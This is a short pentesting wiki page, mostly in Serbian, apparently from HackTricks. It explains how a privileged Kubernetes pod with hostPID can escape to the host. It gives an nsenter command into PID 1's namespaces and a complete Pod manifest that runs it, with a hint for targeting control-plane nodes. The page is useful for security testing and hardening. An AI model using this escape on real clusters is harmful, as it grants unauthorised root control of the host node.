Pod Escape Privileges

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Privileged and hostPID

Sa ovim privilegijama ćete imati pristup procesima hosta i dovoljno privilegija da uđete unutar imenskog prostora jednog od procesa hosta. Imajte na umu da vam potencijalno ne trebaju privilegije, već samo neke sposobnosti i drugi potencijalni zaobilaženja odbrane (kao što su apparmor i/ili seccomp).

Samo izvršavanje nečega poput sledećeg će vam omogućiti da pobegnete iz poda:

nsenter --target 1 --mount --uts --ipc --net --pid -- bash

Primer konfiguracije:

apiVersion: v1
kind: Pod
metadata:
name: priv-and-hostpid-exec-pod
labels:
app: pentest
spec:
hostPID: true
containers:
- name: priv-and-hostpid-pod
image: ubuntu
tty: true
securityContext:
privileged: true
command: [ "nsenter", "--target", "1", "--mount", "--uts", "--ipc", "--net", "--pid", "--", "bash" ]
#nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name

Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Podržite HackTricks

Last updated